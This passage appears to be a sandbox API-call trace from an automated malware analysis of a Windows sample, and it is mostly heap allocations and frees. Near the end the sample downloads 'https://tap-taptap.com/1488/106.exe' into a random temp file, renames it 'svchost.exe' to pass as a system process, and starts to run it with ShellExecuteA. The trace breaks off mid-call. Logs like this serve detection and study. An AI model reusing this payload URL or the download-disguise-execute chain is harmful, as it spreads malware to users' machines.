returned 0x555f60 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fc18 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552018 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fc30 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fc48 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa) returned 0x56fc60 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fc78 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x56fc90 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fca8 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552038 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fcc0 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fcd8 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9) returned 0x56fcf0 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fd08 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5) returned 0x555f70 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x544838 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552058 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5650e8 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565100 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x555f80 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565118 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x3) returned 0x555f90 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565130 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552078 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565148 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565160 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe) returned 0x565178 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565190 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5651a8 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5651c0 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552098 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5651d8 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5651f0 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x565208 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565220 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4d5) returned 0x5739f0 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565238 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x5520b8 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565250 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565268 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x565280 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565298 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555fa0 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5652b0 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x5520d8 [0059.443] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5652c8 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5652e0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5652f8 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565310 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555fb0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565328 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x5520f8 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565340 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565358 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xd) returned 0x565370 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565388 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe) returned 0x5653a0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5653b8 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x552118 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5653d0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x5653e8 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe) returned 0x565400 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565418 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x552138 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565430 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2) returned 0x555fc0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555fd0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555fe0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555ff0 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x565448 [0059.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5) returned 0x556000 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x3) returned 0x556010 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565460 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4d5) returned 0x567d08 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x556020 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x556030 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xe) returned 0x565478 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x552158 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x19) returned 0x550a38 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x573ed0 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x24) returned 0x567580 [0059.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x556040 [0059.445] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550a38 | out: hHeap=0x530000) returned 1 [0059.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x573ed0 | out: hHeap=0x530000) returned 1 [0059.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x552178 [0059.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x24) returned 0x5675b0 [0059.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x573ed0 [0059.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x565490 [0059.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x556050 [0059.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551eb8 | out: hHeap=0x530000) returned 1 [0059.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555ee0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x567550 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551ed8 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555ed0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555ec0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551ef8 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fab0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555eb0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551ff8 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb28 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555ef0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551f98 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f30 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f40 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551fd8 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f50 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f60 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552018 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc60 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc90 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552038 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fcf0 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f70 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552058 | out: hHeap=0x530000) returned 1 [0059.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f80 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555f90 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552078 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565178 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5651a8 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552098 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565208 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5739f0 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5520b8 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565280 | out: hHeap=0x530000) returned 1 [0059.448] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555fa0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5520d8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5652f8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x555fb0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5520f8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565370 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5653a0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552118 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565400 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552138 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d388 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56f9c0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fa50 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb10 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb88 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fbe8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc48 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fcd8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565100 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565160 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5651f0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565268 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5652e0 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565358 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5653e8 | out: hHeap=0x530000) returned 1 [0059.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d340 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d370 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d1f0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d298 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d3d0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56f9f0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56f9d8 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fa80 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fa98 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fa68 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fac8 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fae0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56faf8 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb40 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb58 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fb70 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fba0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fbb8 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fbd0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc00 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc18 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc30 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fc78 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fca8 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fcc0 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56fd08 | out: hHeap=0x530000) returned 1 [0059.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544838 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5650e8 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565118 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565130 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565148 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565190 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5651c0 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5651d8 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565220 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565238 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565250 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565298 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5652b0 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5652c8 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565310 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565328 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565340 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565388 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5653b8 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5653d0 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565418 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565430 | out: hHeap=0x530000) returned 1 [0059.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d1d8 | out: hHeap=0x530000) returned 1 [0059.452] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x567520 | out: hHeap=0x530000) returned 1 [0059.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5733c0 | out: hHeap=0x530000) returned 1 [0059.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56a730 | out: hHeap=0x530000) returned 1 [0059.454] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x557f10 | out: hHeap=0x530000) returned 1 [0059.456] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x558018 | out: hHeap=0x530000) returned 1 [0059.456] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544808 | out: hHeap=0x530000) returned 1 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x552138 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x544808 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x56a158 [0059.456] SystemFunction036 (in: RandomBuffer=0x40e5e4, RandomBufferLength=0x4 | out: RandomBuffer=0x40e5e4) returned 1 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x56d7f0 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x557f10 [0059.456] GetTempPathA (in: nBufferLength=0xff, lpBuffer=0x557f10 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x5733c0 [0059.456] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x558018 [0059.457] SystemFunction036 (in: RandomBuffer=0x40e5e4, RandomBufferLength=0x4 | out: RandomBuffer=0x40e5e4) returned 1 [0059.457] wsprintfA (in: param_1=0x5733c0, param_2="%s%s.%s" | out: param_1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3") returned 57 [0059.457] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x558018 | out: hHeap=0x530000) returned 1 [0059.457] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\lajv5kg3souztzl.kdd3")) returned 0xffffffff [0059.459] URLDownloadToFileA (param_1=0x0, param_2="https://tap-taptap.com/1488/106.exe", param_3="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\lajv5kg3souztzl.kdd3"), param_4=0x0, param_5=0x0) returned 0x0 [0066.812] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\lajv5kg3souztzl.kdd3")) returned 0x2020 [0066.812] Sleep (dwMilliseconds=0x3e8) [0067.898] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x2a57490 [0067.898] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5d05a8 [0067.898] GetTempPathA (in: nBufferLength=0xff, lpBuffer=0x5d05a8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0067.899] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x58e780 [0067.899] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x2a31fb8 [0067.899] SystemFunction036 (in: RandomBuffer=0x40e5e4, RandomBufferLength=0x4 | out: RandomBuffer=0x40e5e4) returned 1 [0067.899] wsprintfA (in: param_1=0x58e780, param_2="%s%s" | out: param_1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2") returned 52 [0067.900] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a31fb8 | out: hHeap=0x530000) returned 1 [0067.900] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2")) returned 0xffffffff [0067.900] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2"), lpSecurityAttributes=0x0) returned 1 [0067.903] wsprintfA (in: param_1=0x58e780, param_2="%s\\svchost.%s" | out: param_1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe") returned 64 [0067.903] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe") returned 64 [0067.903] lstrcpyA (in: lpString1=0x2a57490, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" [0067.904] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58e780 | out: hHeap=0x530000) returned 1 [0067.904] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d05a8 | out: hHeap=0x530000) returned 1 [0067.904] MoveFileA (lpExistingFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\lajv5kg3souztzl.kdd3"), lpNewFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe")) returned 1 [0067.906] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\5zjnws5lvhhy2g2\\svchost.exe")) returned 0x2020 [0067.909] ShellExecuteA (hwnd=0x0, lpOperation="open", 